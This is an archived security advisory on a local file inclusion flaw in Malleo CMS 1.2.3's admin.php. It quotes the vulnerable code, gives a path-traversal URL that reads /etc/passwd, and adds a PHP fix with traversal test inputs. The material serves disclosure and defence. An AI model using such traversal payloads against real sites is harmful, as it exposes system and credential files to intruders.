Malleo 1.2.3 Local File Inclusion

2009-04-18T00:00:00
ID PACKETSTORM:76800
Type packetstorm
Reporter Salvatore Fresta
Modified 2009-04-18T00:00:00

Description

                                        
******* Salvatore "drosophila" Fresta *******
  
[+] Application: Malleo  
[+] Version: 1.2.3  
[+] Website: http://www.malleo-cms.com  
  
[+] Bugs: [A] Local File Inclusion  
  
[+] Exploitation: Remote  
[+] Date: 17 Apr 2009  
  
[+] Discovered by: Salvatore "drosophila" Fresta  
[+] Author: Salvatore "drosophila" Fresta  
[+] Contact: e-mail: drosophilaxxx@gmail.com  
  
  
*************************************************  
  
[+] Menu  
  
1) Bugs  
2) Code  
3) Fix  
  
  
*************************************************  
  
[+] Bugs  
  
  
- [A] Local File Inclusion  
  
[-] Risk: low  
[-] File affected: admin.php  
  
This bug allows a privileged user to include local
files. I decided to publish this bug only to report
the security flaw. The following is the vulnerable
code:
  
...  
  
// $module comes straight from the query string, with no validation
$module = (isset($_GET['module'])) ? $_GET['module'] : $cf->config['default_module_admin'];

...

}else{
    // Update the activity timestamp of the founder session
    if ($cf->config['activer_digicode']) $_SESSION['digicode_TTL'] = time();
    // Unvalidated $module is appended to $root and included
    if (file_exists($root.$module))
    {
        include_once($root.$module);
  
...  
  
  
*************************************************  
  
[+] Code  
  
  
- [A] Local File Inclusion  
  
http://www.site.com/path/admin.php?module=../../../../../etc/passwd  
  
  
*************************************************  
  
[+] Fix  
  
No fix.  
  
  
*************************************************  
  
--   
Salvatore "drosophila" Fresta  
CWNP444351  
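
The advisory lists no fix. One way to constrain the `module` parameter before it reaches `include_once`, as an added example that is not from the advisory's author or the Malleo project: `resolve_module()` is a hypothetical helper, the demo tree is constructed, and the rule that modules are `.php` files under `$root` is an assumption about the layout.

```php
<?php
// Added example, not Malleo code. resolve_module() is a hypothetical helper;
// $root and the 'module' parameter are the names used in the advisory's excerpt.

/**
 * Return the canonical path of $requested only if it resolves to a regular
 * .php file inside $root; otherwise return null.
 */
function resolve_module(string $root, string $requested): ?string
{
    // Reject empty values, NUL bytes, absolute paths and stream wrappers up front.
    if ($requested === '' || strpos($requested, "\0") !== false
        || preg_match('#^([a-z][a-z0-9+.-]*:|[/\\\\])#i', $requested)) {
        return null;
    }
    $base = realpath($root);
    $path = realpath($root . DIRECTORY_SEPARATOR . $requested); // resolves ../ and symlinks
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    // Containment: the canonical path must sit under the canonical root.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    // Only PHP modules are includable (assumption about the module layout).
    return strtolower(pathinfo($path, PATHINFO_EXTENSION)) === 'php' ? $path : null;
}

// Constructed demo: temporary tree with one module and two files outside the root.
$tmp = sys_get_temp_dir() . '/lfi_demo_' . bin2hex(random_bytes(4));
mkdir("$tmp/app/modules", 0700, true);
file_put_contents("$tmp/app/modules/users.php", "<?php // module\n");
file_put_contents("$tmp/secret.txt", "outside root\n");
file_put_contents("$tmp/outside.php", "<?php // outside root\n");

$tests = [
    'modules/users.php'         => true,   // legitimate module
    '../secret.txt'             => false,  // traversal out of the root
    '../outside.php'            => false,  // traversal, allowed extension
    'modules/../../outside.php' => false,  // traversal behind a valid prefix
    '/etc/passwd'               => false,  // absolute path
    'php://filter/resource=x'   => false,  // stream wrapper
];
foreach ($tests as $input => $expected) {
    $ok = resolve_module("$tmp/app", $input) !== null;
    printf("%-28s %-8s %s\n", $input, $ok ? 'allowed' : 'rejected', $ok === $expected ? 'OK' : 'MISMATCH');
}
```

In `admin.php` the returned path, not `$root.$module`, would be what gets passed to `include_once`, with a `null` result treated as a bad request.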